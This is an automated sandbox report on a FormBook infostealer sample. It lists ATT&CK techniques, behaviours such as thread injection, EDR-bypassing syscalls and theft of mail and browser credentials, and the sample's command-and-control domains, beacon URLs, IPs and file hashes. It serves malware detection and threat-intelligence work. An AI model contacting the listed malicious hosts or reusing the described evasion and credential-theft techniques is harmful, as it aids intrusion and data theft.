                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588990 Sample: z6tNjJC614.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 31 www.rtpterbaruwaktu3.xyz 2->31 33 www.fortevision.xyz 2->33 35 13 other IPs or domains 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Yara detected FormBook 2->43 47 4 other signatures 2->47 10 z6tNjJC614.exe 2 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 33->45 process4 signatures5 57 Binary is likely a compiled AutoIt script file 10->57 59 Writes to foreign memory regions 10->59 61 Maps a DLL or memory area into another process 10->61 63 Switches to a custom stack to bypass stack traces 10->63 13 svchost.exe 10->13         started        process6 signatures7 65 Maps a DLL or memory area into another process 13->65 16 tFEgkRNveR.exe 13->16 injected process8 dnsIp9 25 www.connecty.live 203.161.43.228, 49994, 49995, 49996 VNPT-AS-VNVNPTCorpVN Malaysia 16->25 27 rtpterbaruwaktu3.xyz 103.21.221.87, 49986, 49987, 49988 LINKNET-ID-APLinknetASNID unknown 16->27 29 7 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 winver.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                z6tNjJC614.exe83%ReversingLabsWin32.Trojan.AutoitInject
                z6tNjJC614.exe66%VirustotalBrowse
                z6tNjJC614.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.prhmcjdz.tokyo/cm9a/0%Avira URL Cloudsafe
                http://www.bpgroup.site/mlxg/?QbUPL=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGraedJXjbbCkeYoQqBrGkjzfTHxGy2G2a4+AXnGm9DtiGGRVBQ2NqOGZfd&ef4=TJYXELnhFJhl0%Avira URL Cloudsafe
                http://www.bpgroup.site/mlxg/0%Avira URL Cloudsafe
                http://www.jijievo.site/z9pi/?QbUPL=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipuFwHgdvcemFSrMC8OxCAm29CGPtG+jrBp7iHLTW/uD4KAmAXSCgHgFK4&ef4=TJYXELnhFJhl0%Avira URL Cloudsafe
                http://www.tals.xyz/cpgr/0%Avira URL Cloudsafe
                http://www.prhmcjdz.tokyo/cm9a/?ef4=TJYXELnhFJhl&QbUPL=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvrBPGjvGvWTn9eE6YM8B8FSoiTH7Br/Ez7MnCgATlHy+hFK5SJ9epG9Mk0%Avira URL Cloudsafe
                http://www.ytsd88.top/8qt7/?QbUPL=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXiJxWYm89PNrsVDefynVEbypj6mz/ajpHDG/8Uzc6QbTSEQ6i7rwMVRjg&ef4=TJYXELnhFJhl0%Avira URL Cloudsafe
                http://www.tals.xyz/cpgr/?QbUPL=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjEi3gnykaux6zendXb1ybL2/XUTdEdLrQYsm3xUWbOyfaUl/C4vMGWlHL&ef4=TJYXELnhFJhl0%Avira URL Cloudsafe
                http://www.fortevision.xyz/dash/0%Avira URL Cloudsafe
                http://www.rtpterbaruwaktu3.xyz/mv7p/0%Avira URL Cloudsafe
                http://www.connecty.live/6urf/?QbUPL=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR7eoy7wVxfJ9K+U+MKKjLOsgjwrfTYLmZqfPCjIDk3pY25vWCr1O4NF+r&ef4=TJYXELnhFJhl0%Avira URL Cloudsafe
                http://www.50food.com/u9hy/0%Avira URL Cloudsafe
                http://www.connecty.live/6urf/0%Avira URL Cloudsafe
                http://www.ytsd88.top/8qt7/0%Avira URL Cloudsafe
                http://www.fortevision.xyz/dash/?ef4=TJYXELnhFJhl&QbUPL=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q1LAgUq3XcZwqztHS/MhxxHRy56C3xMKSUemxfPW4qvYN+c3Gdt63iP8z0%Avira URL Cloudsafe
                http://www.zriaraem-skiry.sbs0%Avira URL Cloudsafe
                http://www.zriaraem-skiry.sbs/f8c6/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.50food.com
                		147.255.21.187
                		truetrue
                  		unknown
                  all.wjscdn.com
                  		154.205.156.26
                  		truefalse
                    		high
                    ymx01.cn
                    		8.218.14.120
                    		truetrue
                      		unknown
                      www.zriaraem-skiry.sbs
                      		104.21.42.77
                      		truetrue
                        		unknown
                        bpgroup.site
                        		74.48.143.82
                        		truefalse
                          		high
                          www.connecty.live
                          		203.161.43.228
                          		truetrue
                            		unknown
                            www.tals.xyz
                            		13.248.169.48
                            		truefalse
                              		high
                              www.ytsd88.top
                              		47.76.213.197
                              		truefalse
                                		high
                                www.fortevision.xyz
                                		13.248.169.48
                                		truetrue
                                  		unknown
                                  rtpterbaruwaktu3.xyz
                                  		103.21.221.87
                                  		truetrue
                                    		unknown
                                    www.bpgroup.site
                                    		unknown
                                    		unknownfalse
                                      		high
                                      www.rtpterbaruwaktu3.xyz
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.grandesofertas.fun
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.jijievo.site
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.prhmcjdz.tokyo
                                            		unknown
                                            		unknownfalse
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.prhmcjdz.tokyo/cm9a/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ytsd88.top/8qt7/?QbUPL=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXiJxWYm89PNrsVDefynVEbypj6mz/ajpHDG/8Uzc6QbTSEQ6i7rwMVRjg&ef4=TJYXELnhFJhltrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fortevision.xyz/dash/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.bpgroup.site/mlxg/?QbUPL=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGraedJXjbbCkeYoQqBrGkjzfTHxGy2G2a4+AXnGm9DtiGGRVBQ2NqOGZfd&ef4=TJYXELnhFJhltrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.bpgroup.site/mlxg/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.jijievo.site/z9pi/?QbUPL=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipuFwHgdvcemFSrMC8OxCAm29CGPtG+jrBp7iHLTW/uD4KAmAXSCgHgFK4&ef4=TJYXELnhFJhltrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tals.xyz/cpgr/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.prhmcjdz.tokyo/cm9a/?ef4=TJYXELnhFJhl&QbUPL=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvrBPGjvGvWTn9eE6YM8B8FSoiTH7Br/Ez7MnCgATlHy+hFK5SJ9epG9Mktrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tals.xyz/cpgr/?QbUPL=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjEi3gnykaux6zendXb1ybL2/XUTdEdLrQYsm3xUWbOyfaUl/C4vMGWlHL&ef4=TJYXELnhFJhltrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.rtpterbaruwaktu3.xyz/mv7p/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.connecty.live/6urf/?QbUPL=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR7eoy7wVxfJ9K+U+MKKjLOsgjwrfTYLmZqfPCjIDk3pY25vWCr1O4NF+r&ef4=TJYXELnhFJhltrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.50food.com/u9hy/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fortevision.xyz/dash/?ef4=TJYXELnhFJhl&QbUPL=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q1LAgUq3XcZwqztHS/MhxxHRy56C3xMKSUemxfPW4qvYN+c3Gdt63iP8ztrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.connecty.live/6urf/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ytsd88.top/8qt7/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.zriaraem-skiry.sbs/f8c6/true
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabwinver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icowinver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.bt.cn/?from=404tFEgkRNveR.exe, 0000000B.00000002.3133398918.00000000069C8000.00000004.80000000.00040000.00000000.sdmp, winver.exe, 0000000C.00000002.3128888701.00000000051E8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ac.ecosia.org/autocomplete?q=winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwinver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csstFEgkRNveR.exe, 0000000B.00000002.3133398918.00000000071A2000.00000004.80000000.00040000.00000000.sdmp, winver.exe, 0000000C.00000002.3128888701.00000000059C2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.zriaraem-skiry.sbstFEgkRNveR.exe, 0000000B.00000002.3136712972.0000000008744000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    203.161.43.228
                                                                    		www.connecty.liveMalaysia
                                                                    		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                    13.248.169.48
                                                                    		www.tals.xyzUnited States
                                                                    		16509AMAZON-02USfalse
                                                                    104.21.42.77
                                                                    		www.zriaraem-skiry.sbsUnited States
                                                                    		13335CLOUDFLARENETUStrue
                                                                    103.21.221.87
                                                                    		rtpterbaruwaktu3.xyzunknown
                                                                    		9905LINKNET-ID-APLinknetASNIDtrue
                                                                    47.76.213.197
                                                                    		www.ytsd88.topUnited States
                                                                    		9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
                                                                    154.205.156.26
                                                                    		all.wjscdn.comSeychelles
                                                                    		26484IKGUL-26484USfalse
                                                                    147.255.21.187
                                                                    		www.50food.comUnited States
                                                                    		7203LEASEWEB-USA-SFO-12UStrue
                                                                    8.218.14.120
                                                                    		ymx01.cnSingapore
                                                                    		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                    74.48.143.82
                                                                    		bpgroup.siteCanada
                                                                    		14663TELUS-3CAfalse

                                                                    General Information

                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1588990
                                                                    Start date and time:2025-01-11 08:14:49 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 9m 39s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Run name:Run with higher sleep bypass
                                                                    Number of analysed new started processes analysed:18
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:1
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:z6tNjJC614.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:2d6f1128b6b15116c20d67315344e79aaece8d0a636f2ddae9936b1949188dde.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/3@11/9
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 98%
                                                                    • Number of executed functions: 49
                                                                    • Number of non-executed functions: 276
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    No simulations

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    203.161.43.228ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                    • www.futurorks.xyz/cpty/
                                                                    PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                    • www.smartguide.website/idns/
                                                                    CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                    • www.connecty.live/6urf/
                                                                    CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                    • www.connecty.live/6urf/
                                                                    DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                    • www.connecty.live/q6ws/?KV=2RCZf5GiD+fToLXcMHisxCqwWbc28bp5zmUuGnuHZcsPDzCWfzFSI1Df4pF2LDKbQ3OqnVWPrFqSO4182xFWIWWOBmKrBRiY7XTQRir+3P1LJShw3pPG+Dk=&Wno=a0qDq
                                                                    PO2-2401-0016 (TR).exeGet hashmaliciousFormBookBrowse
                                                                    • www.quilo.life/ftr3/
                                                                    PASU5160894680 DOCS.scr.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lyxor.top/top4/
                                                                    Purchase Order TE- 00011-7777.exeGet hashmaliciousFormBookBrowse
                                                                    • www.quilo.life/ftr3/
                                                                    Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                                                                    • www.quilo.life/ftr3/
                                                                    PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                                                                    • www.quilo.life/ftr3/
                                                                    13.248.169.48rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lirio.shop/qp0h/
                                                                    ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                                    • www.10000.space/3zfl/
                                                                    n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lovel.shop/rxts/
                                                                    PGK60fNNCZ.exeGet hashmaliciousFormBookBrowse
                                                                    • www.aktmarket.xyz/wb7v/
                                                                    02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • www.remedies.pro/a42x/
                                                                    zAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                                    • www.aktmarket.xyz/wb7v/
                                                                    SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                    • www.sfantulandrei.info/wvsm/
                                                                    suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                    • www.optimismbank.xyz/98j3/
                                                                    e47m9W6JGQ.exeGet hashmaliciousFormBookBrowse
                                                                    • www.bcg.services/5onp/
                                                                    25IvlOVEB1.exeGet hashmaliciousFormBookBrowse
                                                                    • www.shipley.group/wfhx/

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    all.wjscdn.com5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                    • 154.205.159.116
                                                                    0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                                                                    • 154.205.156.26
                                                                    gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                                    • 154.205.156.26
                                                                    aBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                                    • 154.90.58.209
                                                                    ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                    • 154.205.159.116
                                                                    01152-11-12-24.exeGet hashmaliciousFormBookBrowse
                                                                    • 154.90.58.209
                                                                    DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                    • 154.90.58.209
                                                                    New Order.exeGet hashmaliciousFormBookBrowse
                                                                    • 154.90.35.240
                                                                    TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                                    • 38.54.112.227
                                                                    Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                    • 154.205.159.116
                                                                    ymx01.cnaBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                                    • 8.218.14.120
                                                                    ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 8.210.46.21
                                                                    CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                    • 8.210.46.21
                                                                    CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                    • 8.210.46.21
                                                                    www.zriaraem-skiry.sbsCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                    • 172.67.159.61
                                                                    CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.42.77
                                                                    www.50food.comOVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                                    • 147.255.21.187
                                                                    CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                    • 147.255.21.187
                                                                    CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                    • 147.255.21.187

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    VNPT-AS-VNVNPTCorpVN1N6ZpdYnU3.exeGet hashmaliciousFormBookBrowse
                                                                    • 203.161.49.193
                                                                    02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 202.92.5.23
                                                                    suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                    • 202.92.5.23
                                                                    frosty.ppc.elfGet hashmaliciousMiraiBrowse
                                                                    • 123.29.161.162
                                                                    sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                    • 14.178.148.126
                                                                    5.elfGet hashmaliciousUnknownBrowse
                                                                    • 14.170.79.162
                                                                    3.elfGet hashmaliciousUnknownBrowse
                                                                    • 123.30.26.194
                                                                    armv7l.elfGet hashmaliciousUnknownBrowse
                                                                    • 113.164.118.195
                                                                    http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29tGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                    • 203.161.57.139
                                                                    5.elfGet hashmaliciousUnknownBrowse
                                                                    • 14.172.40.3
                                                                    LINKNET-ID-APLinknetASNIDZcshRk2lgh.exeGet hashmaliciousFormBookBrowse
                                                                    • 103.21.221.4
                                                                    BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                    • 103.21.221.4
                                                                    aBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                                    • 103.21.221.87
                                                                    sora.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                    • 139.10.29.3
                                                                    arm4.elfGet hashmaliciousMiraiBrowse
                                                                    • 139.44.142.78
                                                                    momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                                    • 139.41.98.162
                                                                    armv5l.elfGet hashmaliciousMiraiBrowse
                                                                    • 139.34.88.220
                                                                    DEMONS.ppc.elfGet hashmaliciousUnknownBrowse
                                                                    • 139.16.152.234
                                                                    loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                    • 139.10.78.207
                                                                    loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                    • 139.24.67.215
                                                                    AMAZON-02US5.elfGet hashmaliciousUnknownBrowse
                                                                    • 44.238.49.226
                                                                    rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 3.130.71.34
                                                                    plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.67.87.110
                                                                    ARMV4L.elfGet hashmaliciousUnknownBrowse
                                                                    • 54.171.230.55
                                                                    wSoShbuXnJ.exeGet hashmaliciousFormBookBrowse
                                                                    • 3.252.97.86
                                                                    BLv4mI7zzY.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.228.81.39
                                                                    4.elfGet hashmaliciousUnknownBrowse
                                                                    • 18.131.143.241
                                                                    ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                                    • 18.139.62.226
                                                                    CLOUDFLARENETUSb0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.56.70
                                                                    x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    lrw6UNGsUC.exeGet hashmaliciousXWormBrowse
                                                                    • 104.20.4.235
                                                                    Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.48.1
                                                                    rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.88.139
                                                                    JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 104.21.80.1
                                                                    xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.80.1
                                                                    c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 104.21.80.1
                                                                    b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.80.1
                                                                    ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 104.21.16.1

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Temp\341G64J42

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\winver.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:modified
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
